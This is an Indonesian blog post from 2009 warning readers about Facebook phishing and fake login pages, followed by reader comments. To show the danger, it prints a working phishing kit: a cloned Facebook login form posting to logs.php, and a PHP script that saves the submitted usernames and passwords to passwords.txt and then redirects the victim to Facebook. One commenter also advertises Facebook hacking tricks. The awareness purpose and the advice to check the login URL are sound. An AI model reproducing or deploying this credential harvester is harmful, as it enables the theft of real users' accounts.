Bahaya Phising dan Fake Login Facebook

November 7, 2009 by ariefew
Filed under: programming
Social Bookmark |  



Beberapa bulan terakhir, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti yahoo messenger, maupun dari pesan dari contact list facebook sendiri.

Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng-klik link yang akan membawa mereka keluar dari Facebook.

Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.

Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-click link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.

Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.

Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menaruh box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.

Bagaimana kita tahu kalau itu fake login ?

Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook menggunakan url https://login.facebook.com/login.php

Web phising dengan fake login

Tampilan utama Web phising dengan fake login menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.

<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”><input type=”hidden” name=”charset_test”
value=”&euro;,&acute;,€,´,?,?,?” /><input type=”hidden” id=”locale”
name=”locale” value=”en_US” /><table cellpadding=”0″ cellspacing=”0″><tr><td
class=”login_form_label_field login_form_label_remember”><label><input
type=”checkbox” name=”persistent” value=”1″ />Remember Me</label></td><td
class=”login_form_label_field”><a href=”http://www.facebook.com/reset.php”
rel=”nofollow”>Forgot your password?</a></td><td class=”login_form_last_field
login_form_label_field”></td></tr><tr><td><input type=”text” class=”inputtext”
id=”email” name=”email” value=”" /></td><td><input type=”password”
class=”inputpassword” id=”pass” name=”pass” value=”" /><input type=”text”
class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" /></td><td class=”login_form_last_field”><div
class=”UILinkButton”><input type=”submit” class=”UILinkButton_A” value=”Login”
/><div class=”UILinkButton_RW”><div
class=”UILinkButton_R”></div></div></div></td></tr></table><input type=”hidden”
name=”charset_test” value=”&euro;,&acute;,€,´,?,?,?” /></form>

Lihat code yang di cetak tebal tersebut, code asli dari facebook adalah

<form id=”login_form”
action=”https://login.facebook.com/login.php?login_attempt=1″ method=”POST”>

Yang tercetak tebal, yaitu :

<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”>

adalah pengisian dari form tersebut kita akan diarahkan ke logs.php.
Sedangkan isis dari logs.php adalah pencatatan dari pengisian username dan password tersebut.

<?php
header(“Location:http://www.facebook.com/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Pengisisan di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..

Bahaya kan……

Semoga menjadi pencerahan bagi teman-teman yang beberapa hari lalu menanyakan hal ini padaku lewat YM.




Tags: email, facebook, fake login, IM, password, phising, username, web, website, yahoo messenger, ym



Similiar Post



Popular Post



Random Post











Comments

8 Comments on Bahaya Phising dan Fake Login Facebook

  1. kank_ripayNo Gravatar on Sun, 8th Nov 2009 6:22 pm

    2. saya baru mengenal fake login facebook ketika saya berada di suau warnet dekat kosan saya, pemilik rental warnet ternyata orang nya iseng. memasang fake login ini… sungguh saya jadi males ke warnet itu… untung saya lihat lagi alamatna… jadi.. hati2 lah dalam melakukan login facebook.. lihat dulu, apakah sudah benar atau tidak alamatnya yaitu http://www.facebook.com sebelum melakukan login
    kank_ripay´s last blog ..Perbaikan Website SMAN 1 Ciawigebang My ComLuv Profile

    Reply

  2. BudiarnoNo Gravatar on Mon, 9th Nov 2009 2:31 pm

    3. teman saya juga telah menjadi korban phising seperti ini, padahal browser Mozilla yg dia pake sempat memperingatkannya bahwa website yg dia kunjugi itu ada malwarenya. alhasil, akun fb nya pun jatuh ke tangan orang iseng.

    satunya lagi, teman saya yg hobby main poker juga kayaknya terserang tangan jahil, tapi dengan cara yg berbeda hanya gara-gara dia main di warnet dan punya CHIPS Zynga ber MM….
    Budiarno´s last blog ..Flexinet Pake Modem USB CDMA (PDF) My ComLuv Profile

    Reply

  3. syadiashareNo Gravatar on Thu, 12th Nov 2009 3:51 pm

    4. Info na mantap sekali om.. , berkunjung di sore hari nih ……..
    syadiashare´s last blog ..Download Macromedia Dreamweaver 8 My ComLuv Profile

    Reply

    ariefewNo Gravatar Reply:
    November 13th, 2009 at 4:15 am

    hei…. kok tiba2 muncul di sini… ada apa ini… hehehehhe

    Reply

  4. Pembuat Theme WordPressNo Gravatar on Mon, 16th Nov 2009 8:49 pm

    5. Ada cara hacking facebook level 3, lebih dari sekedar fake.
    Trik Rahasia HAcking Facebook dan twitter …..bisa untuk teknik marketing

    Mantaf ada di webqu buat referensi…Blog Lebih Cepat Dengan Cache Database Dan Cache Widget

    Reply

  5. dPrince Of SmartNo Gravatar on Tue, 5th Jan 2010 2:33 am

    6. Nice posting….

    Bicara tentang pishing memang aga sedikit gerah… tapi terkadang semua yang bersifat negatif tetap saja akan ada hikmahnya, manfaatnya…

    baca kelanjutannya di http://bumikupijak.com/index.php?option=com_content&task=view&id=318&Itemid=2

    Saya masukkan baclinknya yah…

    Reply

  6. dPrince Of SmartNo Gravatar on Thu, 7th Jan 2010 10:34 pm

    7. Oh ya.. minta pendapatnya ya di komentar posting sy disini… sy tunggu…
    http://bumikupijak.com/index.php?option=com_content&task=view&id=318

    Trmksh, maju terus..
    dPrince Of Smart´s last blog ..Pentingkah Hak Cipta? My ComLuv Profile

    Reply

    ariefewNo Gravatar Reply:
    January 8th, 2010 at 12:59 pm

    aku sudah 2 kali coba comment di sana gak bisa masuk…..

    kujawab aja disini mas….

    Kalau kulihat artikel anda tersebut ada 2 masalah yang berbeda yang tdk bisa di ulas menjadi satu.

    Pertama

    Topik tentang Phising dan Fake Login Facebook
    aku mbuat tulisan tentang topik tersebut dikarenakan ada beberapa member forum temanku menanyakan/ mengalami “hack’ facebook. Berkali2 ku jelaskan bahwa website sebesar Fb tdk akan bisa di hack dengan mudah. Jebolnya user dan password FB kita kemungkinan keteledoran kita sendiri yg tdk memperhatikan url yg sesungguhnya. Phising dan Fake Login Facebook bisa lewat mail, atau link dan komentar2 di wall FB sendiri. Penggunaan short url juga menunjang terjadinya Phising dan Fake Login Facebook tersebut.

    Kedua

    Masalah hak cipta
    konten/script/template/widget sangat penting menampilkan link asalnya (asal dari konten/script/template/widget di suatu url) bukan ke url induk atau link si pembuat.
    Jika kita menemukan suatu script/template/widget di internet kita akan tahu asal usulnya, dan aman kah jika dipakai?
    Selain itu script/template/widget pasti sering mengalami perubahan atau revisi, jika terjadi perubahan pasti sangat mudah untuk menelusurinya kembali.
    misal kurs yg ada kubuat, tdk akan bertahan utk selamanya, karena disitu kugunakan teknik graber utk pengambilannya. Jika terjadi perubahan di web asal pasti script yg kugunakan ikut berubah

    Reply

Tell me what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!





CommentLuv Enabled

Comment moderation is enabled. Your comment may take some time to appear.


Subscribe to ariefew rss feed

ariefew feed

  

Enter your email address:

Delivered by FeedBurner